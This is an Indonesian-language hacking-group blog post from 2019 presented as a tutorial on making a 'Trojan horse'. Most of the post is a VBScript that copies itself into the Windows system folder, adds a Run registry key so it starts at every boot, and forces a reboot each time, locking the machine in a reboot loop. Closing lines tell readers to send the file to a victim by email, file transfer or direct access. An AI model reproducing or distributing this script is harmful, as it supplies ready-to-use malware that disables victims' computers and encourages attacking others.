Tuesday 28 May 2019

Cara Membuat dan Menggunakan Trojan Horse





Assalamualaikum teman teman :v
Kembali lagi bersama kami Black Demonstration Cyber

Kali ini kita akan memberikan tutorial membuat trojan horse

Bahan:
1.Notepad
2.Scriptnya
3.Iman :v

Langsung saja =>

Pertama kalian buka notepad kalian

Setelah terbuka copy script dibawah ini

set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2?)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function


Nah setelah di copy terus gimana ? ya di paste lah di notepad !1!1!1!

Lalu save dengan extenxi .vbs   type file nya All FIle

Cara kerjanya dengan di klik 2x
Silhakan anda kirim ke korban anda mau lewat file,email,atau langsung di komputer korban (sesuai dengan kemampuan anda)

Mungkin sekian dulu tutorial dari kami
Wassalamualaikum wr wb

By : All Member BDC

0 comments:

Post a Comment

Berkomentarlah dengan bijak :)
Jangan lupa share ke teman-teman kalian

Template by:

Free Blog Templates